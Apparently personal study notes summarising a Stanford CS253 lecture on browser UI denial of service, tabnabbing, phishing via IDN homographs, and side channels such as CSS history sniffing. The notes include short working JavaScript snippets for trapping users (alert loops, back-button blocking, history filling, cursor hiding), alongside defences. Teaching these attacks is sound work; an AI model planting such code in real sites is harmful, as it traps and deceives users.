Alex's Notes

CS253 Lecture Summaries: Part IX DOS, Phishing, Side Channels

Part of Web Security - Stanford CS 253

Lots of attacks mentioned in the [slides](https://web.stanford.edu/class/cs253/lectures/Lecture 08.pdf)

Mop up of client side security issues not covered to date:

UI Denial of Service

Demonstrated with theannoyingsite.com.

Override browser defaults: disorient or trap the user on site

Scareware: sites which intimidate the user into buying a product by trapping them on an unwanted site.

Annoy the user: can be harmless, or cause users to lose unsaved work.

Browsers used to be a single process, and so this would halt the whole browser:

while(true) {
  window.alert("You're trapped!");
}

Initial solution to this was a checkbox that allowed users to prevent futher alerts.

Current solution is now browsers are multi-process, so you can close the offending tab if you want.

One useful way of thinking about this is that the APIs provided by the browser can be categorized into different levels, depending on restrictions:

Level 0

Restrictions:

No restrictions. API can be used immediately and indiscriminately

Examples:

DOM, CSS, window.move, file download, hide mouse cursor. Note file download is in this class!

Level 1

Restrictions:

User interaction required. API cannot be used except in response to a user activation (click, keypress). Note that scrolling doesn’t count.

Examples:

Element.requestfullscreen(), navigator.vibrate(), copy text to clipboard, speech synthesis, window.open()

Level 2

Restrictions:

User “engagement” required. API cannot be used until user demonstrates high engagement with a website. Browser keeps an engagement metric per site, if threshold is reached these APIs will become active.

Examples:

Autoplay sound, prompt to install website to homescreen.

Level 3

Restrictions:

User permission required. API Cannot be used until user grants explicit permission.

Examples:

Camera, microphone, geolocation, USB, MIDI device access

So how can a site be annoying?

They can call window.open() after interaction, so you can do this:

document.addEventListener('click', () => {
  const win = window.open('', '', 'width=100,height=100')
  win.moveTo(10,10)
  win.resizeTo(200,200)
})

You can intercept all user interaction and run your own code:

function interceptUserInput(onInput) {
  document.body.addEventListener('touchstart', onInput, {passive: false})

  document.body.addEventListener('mousedown', onInput)
  document.body.addEventListener('mouseup', onInput)
  document.body.addEventListener('click', onInput)

  document.body.addEventListener('keydown', onInput)
  document.body.addEventListener('keyup', onInput)
  document.body.addEventListener('keypress', onInput)

You can disable the back button:

function blockBackButton () {
  window.addEventListener('popstate', () => {
    window.history.forward()
  })
}

And fill the user’s history so they can’t just click out of it:

function fillHistory() {
  for (let i = 1; i < 20; i++) {
    window.history.pushState({}, '', window.location.pathname + '?q=' + i)
  }
  //set location back to the initial location
  window.history.pushState({}, '', window.location.pathname)
}

You can copy to clipboard without permission, you can ask to register to be the protocol handler for various protocols.

Cursor attacks are common, you can hide the cursor really easily with:

document.querySelector('html').style = 'cursor: none;'

Then you can create a fake cursor that is offset. You could then make it so that the true cursor would be clicking allow on a permission prompt when the fake cursor looked like it was clicking something else.

Lots of sites used to have their logout route be a get request. But get requests can be sent cross site (See CS253 Lecture Summaries: Part IV: CSRF, Same Origin Policy)

So you could just sign the user out of lots of sites by hitting the logout route. Note that logout routes should be on POST, and cookies should be same site to avoid this. Remember you can post a form to another site so just using ‘POST’ is not enough, you have to disable cross-site cookies.

Tabnabbing is a nasty attack. It exploits the fact that you can open a new tab from a link by setting the attribute target="_blank" on the anchor tag.

Then the new tab will have a reference to the original page via window.opener. If you have a reference to a window you can change its location. See MDN

So you could do something like spoof a Facebook messager site that asks the user to log in again and get their details. Vulnerable to phishing.

How do we defend against this? For any links we need to add rel="noopner" Then window.opener will be null.

There is also a new HTTP header Cross-Origin-Opener-Policy: same-origin Browsers will use a separate OS process to load the site. Prevent cross-window attacks and process side-channel attacks by severing references to other browsing contexts.

Phishing

Phishing is acting like a reputable entity to trick the user into divulging sensitive information such as login credentials or account information.

Often easier than attacking the security of a system directly: Just get the user to tell you their password.

Security is fundamentally a people problem - Schneier.

Unicode can be used to spoof domain names.

Hostnames containing Unicode characters are transcoded to subset of ASCII consisting of letters, digits, and hyphens called punycode

Punycode is a respresentation of Unicode with the limited ASCII character subset used for Internet host names.

Allows registering domains with foreign characters.

But some languages have duplicated Latin characters in their own space, which becomes a separate unicode character that looks the same in browser domain fonts.

This is called an IDN homograph attack. Akin to domain typosquatting, but here we use links that look the same if the browser doesn’t handle it.

Browsers will transcode and display the transcoded url when the url looks suspicious.

Another vector is fullscreen mode

Another is cookie jacking, you used to be able to load an iframe with a src of a cookie you don’t own.

Filejacking is another one - the file upload looks like the download one, you can trick a user into uploading a folder.

UI security attacks are attacks on human perception. Browsers allow untrusted sites to put content in a place that seems trusted.

Side Channel Attacks

Side channel attacks are attacks based on information gathered from the implementation of a computer system, rather than weaknesses in the implemented algorithm itself.

Possible sources of leaks - timing information, power consumption, electromagnetic leaks, sound can provide an extra source of information, which can be exploited.

A classic example is timing. If a system is trying to hide the difference between event A and event B but they take different time, then that can reveal the different events.

You can monitor the power usage during an encryption algorithm and reconstruct it!

A classic attack in web world is the CSS history attack.

The idea is really simple - you add a link to the page and check its colour, a browser would style a visited link in purple and unvisited in blue. So just by looking at the colour of the link you know if the user has visited the page.

How was this tackled? Mozilla restricted the css properties you could apply with the :visited attribute. You can’t change size, position, or load a resource.

You can prevent some timing attacks - make the code paths for visited and unvisited links the same length.

Prevent JS getting the real colour of the link, when you check a link it always reports the unvisited style.

But lots of leaks remain.

Could we improve it? we could ban css properties that affect rendering speed. We could double-key the visited link history (eg site B will show as visited on site A if the user clicks from site A -> site B, but not on site C). Or we could just eliminate the attack vector by removing the ability to style links.

Cross-origin images could also leak data (eg if image is different based on logged in or out status).

Ambient light detection can also leak. EG you can detect browsing history based on whether the light changes by styling a link with a full white/black background.

The gyroscope API can also be used to detect orientation of the device. Could be called without permission. But the gyroscope is so precise that it can pick up audio signals based on the phone’s movement. So now the gyro API is based on permission.

summary

There is a tension between security and capabilities of the browser.

Phishing is a human problem, though technical solutions can help.

Side channels exist all over the place, and are really hard to prevent.